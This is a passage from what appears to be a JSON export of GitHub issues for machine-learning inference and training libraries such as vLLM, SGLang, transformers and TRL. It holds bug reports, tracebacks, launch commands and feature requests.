\"megatron_core\": \"megatron.core\",\n \"modules_to_save\": [\n \"classifier\",\n \"score\",\n \"classifier\",\n \"score\"\n ],\n \"peft_type\": \"LORA\",\n \"r\": 32,\n \"rank_pattern\": {},\n \"revision\": null,\n \"target_modules\": [\n \"gate_proj\",\n \"k_proj\",\n \"up_proj\",\n \"q_proj\",\n \"down_proj\",\n \"v_proj\",\n \"o_proj\"\n ],\n \"task_type\": \"SEQ_CLS\",\n \"trainable_token_indices\": null,\n \"use_dora\": false,\n \"use_rslora\": false\n}\n```", "url": "https://github.com/sgl-project/sglang/issues/15266", "state": "open", "labels": [], "created_at": "2025-12-16T14:14:16Z", "updated_at": "2025-12-16T14:14:22Z", "comments": 0, "user": "dawnik17" }, { "repo": "vllm-project/vllm", "number": 30776, "title": "[Usage]: Qwen3-omni's offline usage", "body": "### Your current environment\n\nI used the code below in vllm==0.12.0, but failed.\n```\nimport os\nimport torch\n\nfrom vllm import LLM, SamplingParams\nfrom transformers import Qwen3OmniMoeProcessor\nfrom qwen_omni_utils import process_mm_info\n\ndef build_input(processor, messages, use_audio_in_video):\n text = processor.apply_chat_template(\n messages,\n tokenize=False,\n add_generation_prompt=True,\n )\n # print(text[0])\n # print(len(text[0]))\n audios, images, videos = process_mm_info(messages, use_audio_in_video=use_audio_in_video)\n\n inputs = {\n 'prompt': text,\n 'multi_modal_data': {},\n \"mm_processor_kwargs\": {\n \"use_audio_in_video\": use_audio_in_video,\n },\n }\n\n if images is not None:\n inputs['multi_modal_data']['image'] = images\n if videos is not None:\n inputs['multi_modal_data']['video'] = videos\n if audios is not None:\n inputs['multi_modal_data']['audio'] = audios\n \n return inputs\n\nif __name__ == '__main__':\n # vLLM engine v1 not supported yet\n os.environ['VLLM_USE_V1'] = '1'\n os.environ['CUDA_DEVICES'] = '0,1,2,3,4,5,6,7'\n\n MODEL_PATH = \"Qwen3-Omni-30B-A3B-Instruct\"\n llm = LLM(\n model=MODEL_PATH, trust_remote_code=True, gpu_memory_utilization=0.95,\n tensor_parallel_size=1,\n limit_mm_per_prompt={'image': 3, 'video': 3, 'audio': 3},\n max_num_seqs=8,\n max_model_len=32768,\n seed=17114,\n )\n\n sampling_params = SamplingParams(\n temperature=0.6,\n top_p=0.95,\n top_k=20,\n max_tokens=16384,\n )\n\n processor = Qwen3OmniMoeProcessor.from_pretrained(MODEL_PATH)\n\n conversation1 = [\n {\n \"role\": \"user\",\n \"content\": 
[\n {\n \"type\": \"video\",\n \"video\": \"1.mp4\",\n \"fps\": 6,\n }\n ],\n }\n ]\n \n USE_AUDIO_IN_VIDEO = True\n\n # Combine messages for batch processing\n conversations = [conversation1]\n inputs = [build_input(processor, messages, USE_AUDIO_IN_VIDEO) for messages in conversations]\n # print(inputs[0])\n outputs = llm.generate(inputs, sampling_params=sampling_params)\n\n for i in range(len(outputs)):\n print(\"\\n\\n==========\\n\")\n print(outputs[i])\n```\nThe error\n```\nTraceback (most recent call last):\n File \"/sft-qwen3-omni/vllm_inference.py\", line 44, in \n llm = LLM(\n ^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/llm.py\", line 334, in __init__\n self.llm_engine = LLMEngine.from_engine_args(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/llm_engine.py\", line 183, in from_engine_args\n return cls(\n ^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/llm_engine.py\", line 109, in __init__\n self.engine_core = EngineCoreClient.make_client(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 93, in make_client\n return SyncMPClient(vllm_config, executor_class, log_stats)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 642, in __init__\n super().__init__(\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 471, in __init__\n with launch_core_engines(vllm_config, executor_class, log_stats) as (\n File \"/usr/lib/python3.12/contextlib.py\", line 144, in __exit__\n next(self.gen)\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/utils.py\", line 903, in launch_core_engines\n wait_for_engine_startup(\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/utils.py\", line 960, in wait_for_engine_startup\n raise RuntimeError(\nRuntimeError: Engine core initialization failed. See root cause above. Failed core proc(s): {'EngineCore_DP0': 1}\n[root:]$ python sft-qwen3-omni/vllm_inference.py\n[2025-12-16 12:25:00] INFO vision_process.py:42: set VIDEO_TOTAL_PIXELS: 90316800\nINFO 12-16 12:25:00 [utils.py:253] non-default args: {'trust_remote_code': True, 'seed': 17114, 'max_model_len': 32768, 'gpu_memory_utilization': 0.95, 'max_num_seqs': 8, 'disable_log_stats': True, 'limit_mm_per_prompt': {'image': 3, 'video': 3, 'audio': 3}, 'model': 'Qwen3-Omni-30B-A3B-Instruct'}\nThe argument `trust_remote_code` is to be used with Auto classes. 
It has no effect here and is ignored.\nUnrecognized keys in `rope_scaling` for 'rope_type'='default': {'mrope_interleaved', 'interleaved', 'mrope_section'}\nUnrecognized keys in `rope_scaling` for 'rope_type'='default': {'interleaved', 'mrope_section'}\nINFO 12-16 12:25:00 [model.py:637] Resolved architecture: Qwen3OmniMoeForConditionalGeneration\nINFO 12-16 12:25:00 [model.py:1750] Using max model len 32768\nINFO 12-16 12:25:00 [scheduler.py:228] Chun", "url": "https://github.com/vllm-project/vllm/issues/30776", "state": "open", "labels": [ "bug", "usage" ], "created_at": "2025-12-16T12:30:18Z", "updated_at": "2025-12-17T17:03:34Z", "comments": 50, "user": "Auraithm" }, { "repo": "sgl-project/sglang", "number": 15260, "title": "SGLang installs newer PyTorch automatically \u2013 is there an official SGLang \u2194 PyTorch compatibility guide?", "body": "Hi SGLang team, thank you for the great project!\n\nI have a question regarding **PyTorch version compatibility and installation**.\n\nCurrently, the recommended installation command from the website is:\n\n```bash\nuv pip install \"sglang\" --prerelease=allow\n```\n\nHowever, when using this command, `pip/uv` automatically upgrades PyTorch to the latest version (e.g., torch 2.9.1).\nIn my environment, I am intentionally pinned to **torch 2.8.x** and would prefer not to upgrade.\n\nAt the moment, it\u2019s not clear:\n\n* Which **SGLang versions are compatible with which PyTorch versions**\n* Whether older SGLang releases are expected to work with torch 2.8\n* What the recommended installation approach is for users who need to keep a specific torch version\n\n### **Questions**\n\n1. Is there an **official or recommended SGLang \u2194 PyTorch compatibility matrix**?\n2. For users pinned to torch 2.8.x, which SGLang version is recommended?\n3. Is it safe to install SGLang with `--no-deps` or a constraints file to prevent torch upgrades?\n4. Would it be possible to document supported torch versions in the release notes or README?\n\n### **Why this matters**\n\nMany users run SGLang in **production or CUDA-pinned environments**, where upgrading PyTorch is non-trivial. Clear guidance would help avoid dependency conflicts and accidental upgrades.\n\nThanks again for your work \u2014 any guidance would be greatly appreciated!", "url": "https://github.com/sgl-project/sglang/issues/15260", "state": "open", "labels": [], "created_at": "2025-12-16T12:27:59Z", "updated_at": "2025-12-16T12:27:59Z", "comments": 0, "user": "David-19940718" }, { "repo": "vllm-project/vllm", "number": 30757, "title": "[Performance]: Async sched: Why return AsyncGPUModelRunnerOutput util func sample_tokens", "body": "### Proposal to improve performance\n\nWhy is AsyncGPUModelRunnerOutput returned only after sample_tokens, not immediately after execute_model?\nhttps://github.com/vllm-project/vllm/blob/0d0c929f2360cde5bae6817ad0f555641329e79d/vllm/v1/engine/core.py#L420-L422\nIf we defer returning AsyncGPUModelRunnerOutput until after sampling, there's a high chance that the async future completes immediately because `AsyncGPUModelRunnerOutput.get_output` is really light workload. 
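A toy sketch of the concern (plain Python with hypothetical timings, not vLLM code): if the producer only enqueues a future after the heavy work has already finished, the consumer never observes any pipeline depth:

```python
# Toy illustration: resolving the future *before* enqueueing it means the
# queue never holds more than one in-flight batch, so nothing overlaps.
import queue
import threading
import time
from concurrent.futures import ThreadPoolExecutor

batch_queue: queue.Queue = queue.Queue(maxsize=2)
gpu = ThreadPoolExecutor(max_workers=1)  # stands in for the GPU stream

def forward(step: int) -> int:
    time.sleep(0.01)  # model forward + sampling
    return step

def producer() -> None:
    for step in range(4):
        fut = gpu.submit(forward, step)
        fut.result()           # returning only after sampling completes
        batch_queue.put(fut)

def consumer() -> None:
    for _ in range(4):
        fut = batch_queue.get()
        # depth is ~0 every time: the "async" output never buys overlap
        print("queue depth:", batch_queue.qsize(), "result:", fut.result())

t = threading.Thread(target=producer)
t.start()
consumer()
t.join()
```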
As a result, the batch_queue size may effectively remain at 1, preventing overlap between model forward and scheduling of the next batch.\nhttps://github.com/vllm-project/vllm/blob/0d0c929f2360cde5bae6817ad0f555641329e79d/vllm/v1/engine/core.py#L430-L438\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30757", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-16T08:26:08Z", "updated_at": "2025-12-16T08:26:49Z", "comments": 0, "user": "iwzbi" }, { "repo": "vllm-project/vllm", "number": 30736, "title": "[Bug] DCP/DBO: 'NoneType' error building attention_metadata during DeepSeek-V3.1 deployment dummy run", "body": "### Your current environment\n\n```bash\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.10.0a0+git9166f61\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-124-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0 : NVIDIA H200\nGPU 1 : NVIDIA H200\nGPU 2 : NVIDIA H200\nGPU 3 : NVIDIA H200\nGPU 4 : NVIDIA H200\nGPU 5 : NVIDIA H200\nGPU 6 : NVIDIA H200\nGPU 7 : NVIDIA H200\n\nNvidia driver version : 570.124.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.1rc4.dev1340+gd08981aba.d20251215 (git sha: d08981aba, date: 20251215)\nvLLM Build Flags:\nCUDA Archs : 9.0\nROCm : Disabled\n```\n\n### \ud83d\udc1b Describe the bug\n\nWhen starting vllm serve with the command below, it fails during the final dummy run step and does not start successfully.\n\nStartup Command:\n\n```bash\nvllm serve deepseek-ai/DeepSeek-V3.1-Terminus \\\n --enable-dbo \\\n --stream-interval 10 \\\n --api-server-count 2 \\\n --max-num-batched-tokens 32768 \\\n --max-num-seqs 256 \\\n --long-prefill-token-threshold 16384 \\\n --scheduling-policy fcfs \\\n --data-parallel-size 2 \\\n --data-parallel-size-local 2 \\\n --tensor-parallel-size 4 \\\n --decode-context-parallel-size 4 \\\n --data-parallel-backend mp \\\n --distributed-executor-backend mp \\\n --enable-expert-parallel \\\n --all2all-backend deepep_low_latency \\\n --max-model-len 131072 \\\n --gpu-memory-utilization 0.8 \\\n --quantization \"fp8\" \\\n 
--trust-remote-code \\\n --enable-auto-tool-choice \\\n --tool-call-parser \"deepseek_v31\" \\\n --chat-template dpsk-v3.1-tool-parser-vllm.jinja \\\n --host ${HOST} \\\n --port ${PORT} \\\n```\n\nError Output\uff1a\n\n```bash\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] WorkerProc hit an exception.\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] Traceback (most recent call last):\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 817, in worker_busy_loop\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] output = func(*args, **kwargs)\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] ^^^^^^^^^^^^^^^^^^^^^\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_worker.py\", line 448, in compile_or_warm_up_model\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] cuda_graph_memory_bytes = self.model_runner.capture_model()\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 4541, in capture_model\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] self._capture_cudagraphs(\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 4615, in _capture_cudagraphs\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] self._dummy_run(\n(Worker_DP1_TP0_DCP0_EP4 pid=479)", "url": "https://github.com/vllm-project/vllm/issues/30736", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-16T03:07:59Z", "updated_at": "2025-12-22T17:11:48Z", "comments": 3, "user": "Butterfingrz" }, { "repo": "huggingface/transformers.js", "number": 1487, "title": "License clarification for some of the converted models", "body": "### Question\n\nHello!\n\nI want to use [Xenova/whisper-small](https://huggingface.co/Xenova/whisper-small) and [Xenova/UAE-Large-V1](https://huggingface.co/Xenova/UAE-Large-V1) in a project, but I noticed that these model cards on Hugging Face do not have a license specified in their metadata or README.\n\nSince the original weights from OpenAI and WhereIsAI are licensed, I assume these converted ONNX versions are intended to follow the same or a similar open-source licenses. 
Could you please clarify:\n\n- Are these models safe to use for commercial/personal projects?\n- Is it possible to update the model cards to explicitly include the license tag?\n\n\nThanks again!", "url": "https://github.com/huggingface/transformers.js/issues/1487", "state": "closed", "labels": [ "question" ], "created_at": "2025-12-16T00:27:16Z", "updated_at": "2025-12-16T19:13:09Z", "user": "rmahdav" }, { "repo": "vllm-project/vllm", "number": 30722, "title": "[Bug]: llama4_pythonic tool parser fails with SyntaxError on nested list parameters", "body": "### Your current environment\n\nI don't have direct access to the cluster the model is running in. But it's running on 8x H100 GPUs using TP 8, expert parallel. \n\nThis is the fp8 model from Huggingface.\n\nThese are the vllm serve args I'm using:\n\nVLLM Version: 0.11.0\n\n```\n--port 8002 \n--model /config/models/maverick \n--device cuda \n--tensor-parallel-size 8 \n--disable-log-requests \n--max-num-batched-tokens 16000 \n--served-model-name 'llama-4-maverick-17b-128e-instruct' \n--limit-mm-per-prompt image=50 \n--kv-cache-dtype fp8 \n--trust-remote-code \n--enable-auto-tool-choice \n--enable-chunked-prefill true \n--enable-prefix-caching \n--tool-call-parser llama4_pythonic \n--enable-expert-parallel \n--chat-template examples/tool_chat_template_llama4_pythonic.jinja \n--override-generation-config '{\\\"attn_temperature_tuning\\\": true}' \n--max-model-len 1000000\n```\n\n### \ud83d\udc1b Describe the bug\n\n### Description\n\nThe `llama4_pythonic` tool parser intermittently fails to parse valid tool calls, resulting in:\n1. `SyntaxError` from `ast.parse()` when model output is malformed (missing closing `]`)\n2. Valid pythonic syntax returned as `content` instead of being parsed into `tool_calls`\n\n### Reproduction\n\n**Minimal curl (run 10+ times to observe intermittent failure):**\n\n```bash\ncurl -X POST https://your-vllm-endpoint/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"llama-4-maverick-17b-128e-instruct\",\n \"messages\": [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": \"how do I enroll in benefits?\"}\n ],\n \"tools\": [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"enterprise_search\",\n \"description\": \"Search enterprise knowledge base\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"query\": {\"type\": \"string\"},\n \"rephrased_queries\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"description\": \"List of 2 rephrased queries\"\n }\n },\n \"required\": [\"query\", \"rephrased_queries\"]\n }\n }\n }],\n \"tool_choice\": \"auto\",\n \"max_tokens\": 500,\n \"temperature\": 0,\n \"top_p\": 0.95\n }'\n```\n\n**Observed results (10 identical requests):**\n- 7/10: \u2705 `finish_reason: \"tool_calls\"`, properly parsed\n- 3/10: \u274c `finish_reason: \"stop\"`, pythonic syntax in `content` field, empty `tool_calls`\n\n### Failure Modes Observed\n\n**Mode 1: Valid pythonic not parsed**\n```json\n{\n \"finish_reason\": \"stop\",\n \"message\": {\n \"content\": \"[enterprise_search(query=\\\"Benefits enrollment\\\", rephrased_queries=[\\\"...\\\", \\\"...\\\"])]\",\n \"tool_calls\": []\n }\n}\n```\nParser fails to detect valid syntax \u2192 returned as content.\n\n**Mode 2: Model generates text after tool call**\n```json\n{\n \"content\": \"[enterprise_search(...)]\\n\\nI was unable to execute this task...\"\n}\n```\nModel mixes tool call + text, which violates 
parser assumption.\n\n**Mode 3: Malformed output (missing bracket)**\n```\n[enterprise_search(query='...', rephrased_queries=['...', '...'])\n```\nModel hits `stop_reason: 200007` before completing \u2192 `ast.parse()` throws SyntaxError.\n\n### Suspected Root Cause\n\n***The below is suggested by Claude Opus 4.5 so take with a grain of salt.***\n\n1. **Parser detection inconsistency** - Valid pythonic output intermittently not recognized as tool call\n2. **No text-after-tool-call handling** - Parser fails when model appends text after `]`\n3. **Stop token interference** - Model sometimes hits stop token (200007) mid-generation before completing brackets\n4. **Nested bracket complexity** - Array parameters (`rephrased_queries`) create `[...[...]...]` nesting that may confuse detection\n\n### Error Logs\n\n[err.txt](https://github.com/user-attachments/files/24175232/err.txt)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30722", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-15T21:26:24Z", "updated_at": "2025-12-15T21:26:24Z", "comments": 0, "user": "mphilippnv" }, { "repo": "huggingface/tokenizers", "number": 1913, "title": "Wrong and unsuppressable print when instantiating BPE", "body": "I am running Python code that is of the form\n\n```python\nfrom transformers import PreTrainedTokenizerFast\nfrom tokenizers import Tokenizer\nfrom tokenizers.models import BPE\n\nvocab = {\"a\": 5, \"b\": 6, \"ab\": 7}\nmerges = [(\"a\",\"b\")]\n\nbackend_of_backend_of_backend = BPE(vocab=vocab, merges=merges, dropout=None)\nbackend_of_backend = Tokenizer(model=backend_of_backend_of_backend)\nbackend = PreTrainedTokenizerFast(tokenizer_object=backend_of_backend)\n```\n\nThe line `BPE(vocab=vocab, merges=merges, dropout=None)` has nothing to do with serialisation. Yet, when I run it, an unwanted print\n```\nThe OrderedVocab you are attempting to save contains holes for indices [0, 1, 2, 3, 4], your vocabulary could be corrupted!\n```\nappears in my console, which seems to come from\n\nhttps://github.com/huggingface/tokenizers/blob/f7db48f532b3d4e3c65732cf745fe62863cbe5fa/tokenizers/src/models/mod.rs#L53-L56\n\nNot only is the print wrong (I am not trying to **save** anything), but also, it cannot be suppressed by redirecting `stdout` and `stderr` in Python. \n\n`println!` does not belong in low-level code, so at the very least, we need a way to disable it. But besides, what is this print even for, given that it says something about **saving** when we are **loading** a tokenizer?", "url": "https://github.com/huggingface/tokenizers/issues/1913", "state": "closed", "labels": [], "created_at": "2025-12-15T16:30:46Z", "updated_at": "2026-01-05T13:02:45Z", "comments": 4, "user": "bauwenst" }, { "repo": "vllm-project/vllm", "number": 30694, "title": "[Feature]: CompressedTensors: NVFP4A16 not supported for MoE models", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nNVFP4A16 (W4A16 FP4) quantization via compressed_tensors works for dense models but fails on MoE models like Qwen3-30B-A3B.\n\nLooking at `compressed_tensors_moe.py`, `_is_fp4a16_nvfp4` is checked for Linear layers but not in `get_moe_method()` for FusedMoE. 
Only W4A4 has a MoE method (`CompressedTensorsW4A4Nvfp4MoEMethod`).\n\nSince the Marlin kernel already supports FP4 weights + FP16 activations, is there a plan to add W4A16 MoE support for compressed_tensors? \n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30694", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-15T13:29:09Z", "updated_at": "2025-12-21T09:27:38Z", "comments": 2, "user": "zhangyimi" }, { "repo": "vllm-project/vllm", "number": 30685, "title": "[Feature]: fp8 kv cache for finer-grained scaling factors (e.g., per channel).", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCurrently, the FP8 KV cache feature (in the FlashMLA interface) only supports per-tensor (scalar) scaling factors. Are you developing support for finer-grained scaling factors (e.g., per-channel)? If so, when can we expect the FP8 KV cache with such finer-grained scaling factors to be completed?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30685", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-15T09:32:48Z", "updated_at": "2025-12-15T09:32:48Z", "comments": 0, "user": "zx-ai" }, { "repo": "huggingface/transformers", "number": 42868, "title": "sdpa_paged: How does it handle paged cache without padding?", "body": "Hi @ArthurZucker ,\n\nI was analyzing the [sdpa_paged](https://github.com/huggingface/transformers/blob/main/src/transformers/integrations/sdpa_paged.py#L18) implementation and found the approach quite fascinating. I have a question regarding how the input shapes are handled.\n\nIf I have a batch of 4 sequences with lengths **32, 32, 64, and 128**, a standard SDPA call usually expects a shape of `[4, 128]` (Batch Size, Max Seq Len), where the shorter sequences are padded to 128.\n\nHowever, in this implementation, it appears that the input to SDPA is a flattened tensor with shape **`[1, 256]`** (the sum of all lengths: $32+32+64+128$), implying that no padding is used and the sequences are concatenated.\n\nCould you explain how standard SDPA produces the correct result in this case? Specifically, how does it differentiate between the sequences to prevent cross-sequence attention within this single packed batch?\n\nThanks for your time!\n\n\nrelated PR: #38085", "url": "https://github.com/huggingface/transformers/issues/42868", "state": "closed", "labels": [], "created_at": "2025-12-15T08:39:00Z", "updated_at": "2025-12-16T03:08:27Z", "comments": 4, "user": "jiqing-feng" }, { "repo": "huggingface/trl", "number": 4692, "title": "LLVM error during GRPO training with Apple M4 Max", "body": "I have the below error while doing GRPO training. I am using HuggingFace example codes for GRPO. I couldn't run the model on MPS because of this issue. 
\nHow can I run GRPO on MPS?\n\nloc(\"mps_matmul\"(\"(mpsFileLoc): /AppleInternal/Library/BuildRoots/4~B_wkugAG-524HdEQLaK0kvU7Y_D8Jtm6UxMaIoY/Library/Caches/com.apple.xbs/Sources/MetalPerformanceShadersGraph/mpsgraph/MetalPerformanceShadersGraph/Core/Files/MPSGraphUtilities.mm\":43:0)): error: incompatible dimensions\nloc(\"mps_matmul\"(\"(mpsFileLoc): /AppleInternal/Library/BuildRoots/4~B_wkugAG-524HdEQLaK0kvU7Y_D8Jtm6UxMaIoY/Library/Caches/com.apple.xbs/Sources/MetalPerformanceShadersGraph/mpsgraph/MetalPerformanceShadersGraph/Core/Files/MPSGraphUtilities.mm\":43:0)): error: invalid shape\nLLVM ERROR: Failed to infer result type(s).\n\nDetails: \nOS: Tahoe 26.2\npytorch 2.9.1\ntrl: 0.26.1\nMLX:0.30.0\n\n\n\n\n\n", "url": "https://github.com/huggingface/trl/issues/4692", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb GRPO" ], "created_at": "2025-12-14T23:01:49Z", "updated_at": "2025-12-14T23:02:11Z", "comments": 0, "user": "neslihaneti" }, { "repo": "vllm-project/vllm", "number": 30654, "title": "[Feature][Attention][UX]: Incorporate Features into Attention Selection", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSUMMARY:\n* we have default attention backends by priority and a notion of which backend supports what hw\n* however, certain features are not considered in this (e.g. fp8 kv cache, e.g. attention sinks)\n\nRecent example, we had test failures because we updated the logic to load kv cache quantization from the model config. But since CUTLASS_MLA is the default backend on B200, we started seeing test failures (since CUTLASS MLA does not support fp8 kv cache) because we were not automatically falling back to FLASHINFER_MLA (which does)\n\n\nSo the proposal is to:\n- make sure all attention backends report what features are supported\n- update the attention selector to consider these features in the selection\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30654", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-14T18:04:14Z", "updated_at": "2025-12-30T05:38:40Z", "comments": 11, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/diffusers", "number": 12838, "title": "Merge Loras for FLUX", "body": "The issue is based on https://huggingface.co/docs/diffusers/main/using-diffusers/merge_loras \n\nIs there a similar procedure for merging loras for FLUX models? The guide seems to be specific for UNet based methods. I'm working on FLUX-dev and I would like to perform a linear merge of my loras. ", "url": "https://github.com/huggingface/diffusers/issues/12838", "state": "open", "labels": [], "created_at": "2025-12-14T12:39:41Z", "updated_at": "2025-12-14T12:39:41Z", "comments": 0, "user": "shrikrishnalolla" }, { "repo": "vllm-project/vllm", "number": 30633, "title": "[Installation]: How to install vLLM 0.11.0 with CUDA < 12.9 (Driver 535)? 
No matching wheels found", "body": "### Your current environment\n\nI\u2019m trying to install vLLM 0.11.0 on a machine with NVIDIA Driver 535, and I ran into issues related to CUDA version compatibility.\n\nEnvironment\n\nOS: Linux (Ubuntu 20.04 / 22.04)\n\nGPU: NVIDIA H20\n\nNVIDIA Driver: 535.xx\n\nPython: 3.10\n\nvLLM version: 0.11.0\n\nProblem\n\nAccording to the release information for vLLM 0.11.0, the available prebuilt wheels appear to target CUDA 12.9+.\nHowever, with Driver 535, CUDA 12.9 is not supported, and I cannot find any official wheels for CUDA 12.1 / 12.2 / 12.4 or lower.\n\nThis leads to the following questions:\n\nIs vLLM 0.11.0 officially compatible with CUDA versions < 12.9?\n\nIf yes, what is the recommended way to install it on systems with Driver 535?\n\nBuild from source with a specific CUDA version?\n\nUse a specific Docker image?\n\nPin to an older vLLM release?\n\nAre there plans to provide prebuilt wheels for CUDA 12.1 / 12.4, or is CUDA 12.9+ now a hard requirement going forward?\n\nWhat I\u2019ve tried\n\nChecked the GitHub Releases page for vLLM 0.11.0 \u2014 no wheels for CUDA < 12.9\n\nVerified that upgrading CUDA to 12.9 is not possible with Driver 535\n\nLooked for documentation on source builds for older CUDA versions, but didn\u2019t find clear guidance\n\nAny clarification or recommended workflow would be greatly appreciated.\nThanks in advance!\n\n### How you are installing vllm\n\n```sh\npip install -vvv vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30633", "state": "open", "labels": [ "installation" ], "created_at": "2025-12-14T04:29:41Z", "updated_at": "2026-01-01T16:50:50Z", "comments": 1, "user": "whu125" }, { "repo": "vllm-project/vllm", "number": 30630, "title": "[Usage]: SymmMemCommunicator: Device capability 10.3 not supported", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nHi, I am seeing the following warning when using vllm serve on B300 instances.\n```\nWARNING 12-13 16:31:15 [symm_mem.py:67] SymmMemCommunicator: Device capability 10.3 not supported, communicator is not available.\n```\nvllm launch command\n```\nvllm serve \\\n --tensor-parallel-size 4 \\\n --kv-cache-dtype fp8 \\\n --tool-call-parser glm45 \\\n --reasoning-parser glm45 \\\n --enable-auto-tool-choice \\\n --model zai-org/GLM-4.6-FP8\n```\nI built a docker image using the latest vllm on main branch commit 0e71eaa6447d99e76de8e03213ec22bc1d3b07df. Updated the triton version to 3.5.1 and the torch version to 2.9.1 to avoid a compatibility issue from triton 